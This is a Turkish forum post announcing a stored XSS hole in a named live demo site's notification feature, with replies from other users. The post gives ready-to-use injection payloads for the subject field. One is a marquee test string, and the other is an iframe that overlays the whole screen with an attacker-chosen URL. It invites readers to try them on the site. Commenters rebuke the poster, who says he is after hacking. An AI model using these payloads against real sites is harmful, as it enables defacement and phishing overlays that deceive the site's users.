v2.5.2
Giriş yap

http://demo.webslesson.info/ Soru Sorma Sitesi Xss Açıklığı

suphi
7,466 defa görüntülendi

Merhaba Xss Açıklığı Kulanmasını Bilene Çok Önemli Bir Açıklık Olup Bilmeyene Oyuncak Olur :)
öncelikle

http://demo.webslesson.info/

sitenin amacı : bildirim.php test etmek yani facebook tarzı bildirim göndermek
,,
sitesine gidip
enter subject diyen yere

"><marquee>MERHABAAA

yazın mesaja da xxxxxx yazın ve bildirimlere tıklayınca herşey kayıyor .
bunun yerine

"><iframe src= "burayaURL.com" style=position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;> </iframe>

Koyunca Bildirimlere Basar Basmaz Tüm Ekran Sizin Verdiğiniz Site Olarak Gözükür.
Gidip Bakın :)

Cevap yaz
Cevaplar (5)
qplot
1208 gün önce

çünki adamlar hiç bir ücret almadan insanlara bir şey öğretmeye çalışıyor ve
bi sen biliyorsun zaten bu açıkları ve burada paylaşıyorsun
profilindede belliki öğrenme yerine hackleme derdindesin

aydinkeskin
1207 gün önce

bence sen önce bir kişisel gelişim eğitimi al
sonra genel kültür

siber güvenliği sonra düşünürsün :)

suphi
1207 gün önce

evet hack derdindeyim benim hedefim zaten siber güvenlik .

suphi
1208 gün önce

neden?

qplot
1267 gün önce

kendinden utanmalısın